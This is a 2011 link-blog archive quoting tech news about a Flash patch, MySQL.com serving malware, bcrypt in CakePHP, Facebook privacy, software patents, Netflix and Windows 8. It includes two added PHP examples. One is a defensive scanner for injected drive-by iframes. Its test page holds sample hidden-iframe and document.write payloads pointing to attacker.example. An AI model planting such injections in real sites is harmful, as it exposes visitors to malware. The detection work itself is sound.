26 Sep

PCMag – Google Patches Flash Zero Day Bug, Jumps the Gun on Adobe Again

Google has developed a bad habit with respect to patching vulnerabilities in the integrated version of Adobe Flash in their Chrome for Windows browser: They release and announce the updates before Adobe does. They have done it several times in the last year or so and today they did it again. "The Beta and Stable channels have been updated to 14.0.835.186 for Windows, Mac, Linux, and Chrome Frame."

This creates a situation in which Adobe has a zero day bug with increased severity. It’s likely that they aren’t ready to release their own patches, yet 3rd parties could look at the Chrome update and potentially examine it in order to determine what it is patching. From that they could construct an exploit.

via PCMag – Google Patches Flash Zero Day Bug, Jumps the Gun on Adobe Again. The bad habit isn’t Google patching security holes, it’s Adobe not patching them first.

26 Sep

Ars Technica – Hackers turn MySQL.com into malware launchpad

Web security firm Armorize reported in its blog today that the MySQL.com website has been turned into a launchpad for serving up malware attacks. Visitors to the home page of the site are hit with a JavaScript injection attack that has been planted on the site. The script opens an IFRAME to a malicious site, which in turn launches a BlackHole exploit "pack" that probes for known browser and plugin weaknesses and then stealthily installs malware on the visitor’s PC. There’s no warning button or action required by the user other than visiting the site to trigger the download.

via Ars Technica – Hackers turn MySQL.com into malware launchpad. What the heck is Oracle doing with MySQL? Also, how long would you keep trusting Oracle software with this kind of security failing?
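The injection Armorize describes follows a pattern that is easy to check for once you have the page source: an element that pulls in an off-site URL while rendering nothing visible. The following scanner is an added example and is not from the Ars Technica or Armorize write-ups; the function name, the hidden-element heuristics and the sample page (including the attacker.example host) are constructed for illustration.

```php
<?php
// Added example (not Armorize's or Ars Technica's code): a triage scanner for
// planted drive-by embeds. Flags iframes that point off-site while being sized
// or styled so they are invisible, off-site script tags, and inline scripts that
// build an iframe at runtime via document.write/unescape. Heuristics are
// deliberately simple; real injections are often far more obfuscated.

function findSuspiciousEmbeds(string $html, string $siteHost): array {
    $findings = [];
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);      // tolerate non-XHTML, real-world markup
    $doc->loadHTML($html);
    libxml_clear_errors();

    foreach ($doc->getElementsByTagName('iframe') as $iframe) {
        $src   = $iframe->getAttribute('src');
        $host  = parse_url($src, PHP_URL_HOST);   // null for relative URLs
        $style = strtolower($iframe->getAttribute('style'));
        $w = (int) $iframe->getAttribute('width');
        $h = (int) $iframe->getAttribute('height');
        $hidden = ($iframe->hasAttribute('width') && $w <= 1)
               || ($iframe->hasAttribute('height') && $h <= 1)
               || strpos($style, 'display:none') !== false
               || strpos($style, 'visibility:hidden') !== false
               || preg_match('/(left|top)\s*:\s*-\d{3,}/', $style);   // pushed off-screen
        if ($host !== null && $host !== $siteHost && $hidden) {
            $findings[] = "hidden off-site iframe -> $src";
        }
    }

    foreach ($doc->getElementsByTagName('script') as $script) {
        $src = $script->getAttribute('src');
        if ($src !== '') {
            $host = parse_url($src, PHP_URL_HOST);
            if ($host !== null && $host !== $siteHost) {
                $findings[] = "off-site script -> $src";
            }
            continue;
        }
        // Inline script that writes an iframe at runtime, a common obfuscation step
        $body = $script->textContent;
        if (preg_match('/document\.write\s*\(.*(unescape|iframe)/is', $body)
            || preg_match('/(?:\\\\x[0-9a-f]{2}){8,}/i', $body)) {   // long \xNN runs
            $findings[] = 'inline script writes/unescapes content: ' . substr(trim($body), 0, 60);
        }
    }
    return $findings;
}

// Constructed sample page: legitimate markup plus two planted payloads.
$sample = <<<'HTML'
<html><head><title>Example DB</title><script src="/js/site.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="http://attacker.example/load.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Ciframe src=%22http://attacker.example/x%22%3E%3C/iframe%3E"));</script>
</body></html>
HTML;

foreach (findSuspiciousEmbeds($sample, 'www.example.com') as $finding) {
    echo $finding, PHP_EOL;
}
```

Run against the constructed page this reports the 1x1 hidden iframe and the inline `document.write(unescape(...))` script, and stays quiet about the site's own `/js/site.js`. The same-host check is the weak spot: an attacker who can write to the web root can host the exploit loader on the compromised site itself, so treat this as a first pass over a page you already suspect, not as proof a page is clean.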

26 Sep

Mark Story – Using bcrypt for passwords in CakePHP

CakePHP uses salted sha1 hashes for passwords by default, and has for a while. There has been some talk on the mailing list lately of switching the default hashing to something more secure, such as bcrypt. I think this is a great idea, and will find its way into CakePHP in a future release. Providing a reasonable upgrade experience is the biggest problem to solve, if the default hashing strategy were to change. One option is to silently upgrade passwords. I’m not a fan of this approach as it has more room to go wrong, and possibly corrupt data. Another option, allowing developers to stick with sha1 if they have passwords hashed with it, is a safer and probably better overall option.

While bcrypt is not part of CakePHP just yet, I wanted to see how difficult it would be to start using bcrypt today. Turns out it was pretty simple. Getting bcrypt working only required a subclass of FormAuthenticate and a two line change to the User class.

via Mark Story – Using bcrypt for passwords in CakePHP. Awesome, I tried doing this in CakePHP 1.3 a few weeks ago but couldn’t get it to work right all the time.
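The two upgrade strategies the post weighs, keep verifying old sha1 hashes or silently move users to bcrypt, can live in one verification routine. The code below is an added example and is not Mark Story's code or CakePHP's: the function names, the salt value, the cost and the user record are constructed, and the legacy format is modelled on the sha1(salt . password) scheme the post describes rather than taken from the framework. It uses PHP's built-in password_hash/password_verify API, which postdates the post.

```php
<?php
// Added example (not from Mark Story's post or CakePHP): verify both legacy
// salted-sha1 hashes and bcrypt hashes from one place, and hand back a bcrypt
// hash to persist when a legacy password verifies. Dropping the persistence
// step gives the "stick with sha1 for old hashes" option the post prefers.

const LEGACY_SALT = 'DYhG93b0qyJfIxfs2guVoUubWwvniR2G0FgaC9mi'; // constructed stand-in for the app salt
const BCRYPT_COST = 12;

// Legacy scheme modelled on the post's description: sha1(salt . password).
function legacyHash(string $password): string {
    return sha1(LEGACY_SALT . $password);
}

// bcrypt hashes carry a recognisable "$2a$/$2b$/$2y$" prefix; sha1 hashes are bare hex.
function isBcryptHash(string $hash): bool {
    return (bool) preg_match('/^\$2[aby]\$\d{2}\$/', $hash);
}

function hashPassword(string $password): string {
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
}

// Returns [bool $ok, string|null $upgradedHash]. $upgradedHash is set only when
// the password verified AND the stored hash should be replaced (legacy format,
// or bcrypt with a lower cost than we now want). Nothing is written here; the
// caller persists it, so a failed login can never touch the stored hash.
function verifyPassword(string $password, string $storedHash): array {
    if (isBcryptHash($storedHash)) {
        if (!password_verify($password, $storedHash)) {
            return [false, null];
        }
        $needsRehash = password_needs_rehash($storedHash, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
        return [true, $needsRehash ? hashPassword($password) : null];
    }
    // Legacy path: constant-time comparison against sha1(salt . password).
    if (!hash_equals($storedHash, legacyHash($password))) {
        return [false, null];
    }
    return [true, hashPassword($password)];
}

// Usage with a constructed user record that still holds a legacy hash.
$user = ['username' => 'alice', 'password' => legacyHash('correct horse battery staple')];

[$ok, $upgraded] = verifyPassword('correct horse battery staple', $user['password']);
if ($ok && $upgraded !== null) {
    $user['password'] = $upgraded;          // persist only after a verified login
}
[$okAgain, $noUpgrade] = verifyPassword('correct horse battery staple', $user['password']);
[$bad, $none] = verifyPassword('wrong password', $user['password']);

var_dump($ok, isBcryptHash($user['password']), $okAgain, $noUpgrade === null, $bad, $none === null);
```

Two details matter for the "room to go wrong" concern in the post: the legacy branch is reached only for hashes that do not look like bcrypt, so a half-migrated table keeps working, and the rehash is returned rather than written, so the only moment a row changes is inside a successful login. The legacy comparison uses hash_equals rather than == so verification time does not leak how much of the hash matched.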

24 Sep

Scripting News – Facebook is scaring me

What clued me in was an article on ReadWriteWeb that says that just reading an article on their site may create an announcement on Facebook. Something like: "Bull Mancuso just read a tutorial explaining how to kill a member of another crime family." Bull didn’t comment. He didn’t press a Like button. He just visited a web page. And an announcement was made on his behalf to everyone who follows him on Facebook. Not just his friends, because now they have subscribers, who can be total strangers.

Now, I’m not technically naive. I understood before that the Like buttons were extensions of Facebook. They were surely keeping track of all the places I went. And if I went to places that were illegal, they would be reported to government agencies. Bull Mancuso in the example above has more serious things to worry about than his mother finding out that he’s a hitman for the mob. (Both are fictitious characters, and in my little story his mom already knows he’s a hitman.)

There could easily be lawsuits, divorces, maybe even arrests based on what’s made public by Facebook.

via Scripting News – Facebook is scaring me. Count me in the group of people now staying logged out of Facebook by default.

24 Sep

Numair Faraz – I was once a Facebook fool

If you are entrusting your life data to Facebook, or if you are depending on Facebook and its platform for your livelihood, beware. In the real Facebook world, there is no trust, and there is no friendship — there is only money and power. Think really hard — really, think — before trusting Facebook or its employees with anything. Don’t be a Facebook fool.

via Numair Faraz – I was once a Facebook fool. Trusting your business to another business is generally not a good idea, but trusting Facebook is never a good idea.

24 Sep

The White House – Direct the Patent Office to Cease Issuing Software Patents

The patent office’s original interpretation of software as language and therefore patentable is much closer to reality and more productive for innovation than its current practice of issuing software patents with no understanding of the patents being issued.

Under the patent office’s current activity, patents have become a way to stifle innovation and prevent competition rather than supporting innovation and competitive markets. They’ve become a tool of antitrust employed by large companies against small ones.

To return sanity to the software industry – one of the few industries still going strong in America – direct the patent office to cease issuing software patents and to void all previously issued software patents.

via The White House – Direct the Patent Office to Cease Issuing Software Patents. Why haven’t you signed this petition?

20 Sep

Online Video News – Netflix’s DVD business: Does Qwikster have a future?

Netflix announced in a blog post Sunday evening that its DVD-by-mail operations would soon be rebranded “Qwikster,” and that the service would be separated from the streaming service that the company has been pushing for the last several years. Doing so clearly grants some independence to the unit, and will help it to operate without dealing with the fast-growing streaming business. But it also raises questions about the future viability of a standalone DVD-by-mail operation.

Netflix isn’t completely abandoning the new DVD business — at least, not yet. After all, Qwikster will have the same characteristic red envelope and the same legacy infrastructure and library supporting it. However, it seems clear that Netflix is creating a wall between the two businesses as a way to smartly manage its profits and losses, and to help Wall Street better value the separate operations.

via Online Video News – Netflix’s DVD business: Does Qwikster have a future? Most people have complained primarily about the price increase Netflix brought about with splitting up its DVD and Streaming plans. That’s a side issue; licensing fees for streaming have most likely increased as the popularity and catalog of streamed movies increased.

The thing that bothers me about this decision is it makes a worse experience for those customers who straddle the line (using both the DVD and Streaming plans). All of a sudden we have multiple queues, websites, rating systems, etc. One side aspect of this is who gets the core of the team that works on predicting what movie you’ll like after ranking this other movie (Netflix’s real golden goose). Will my rankings on one site generate better results? It also begins to sound like Netflix is planning to sell off its DVD side of the business. Never outside the realm of possible options, but now it feels like it could happen in the next 6 months and Netflix couldn’t be bothered otherwise.

How long until Qwikster becomes just another forgotten piece of internet real estate?

20 Sep

Daring Fireball – The Case for Going Metro-Only on ARM

Read the whole thing. His take is reasonable. If Windows 8 does ship with support for classic non-Metro apps on ARM machines, these will be the reasons why.

But there are other good reasons, I think, for why Microsoft should cut the cord cleanly and go Metro-only on ARM.

via Daring Fireball – The Case for Going Metro-Only on ARM. When I posted the link about Windows 8 being able to run normal desktop apps, I somewhat flippantly said that it “could keep Windows 8 from being truly awesome”; this is why.

20 Sep

ZDNet – Microsoft: Desktop apps will run on Windows 8 on ARM

I’ve heard numerous folks who attended Build in person and/or via Webcasts say that there will be no Desktop app experience when Windows 8 ships on PCs and tablets running on ARM processors. Until today, I thought the same. But this is not correct.

Microsoft officials have been saying for months that existing x86 applications won’t just run on Windows on ARM; they will need to be recompiled. Microsoft is hoping and expecting that the majority of devs will go to the trouble of “Metro-izing” their apps while they are recompiling them to run on Windows 8 on ARM. However, that is guidance, and not a requirement.

via ZDNet – Microsoft: Desktop apps will run on Windows 8 on ARM. That’s the decision that could keep Windows 8 from being truly awesome.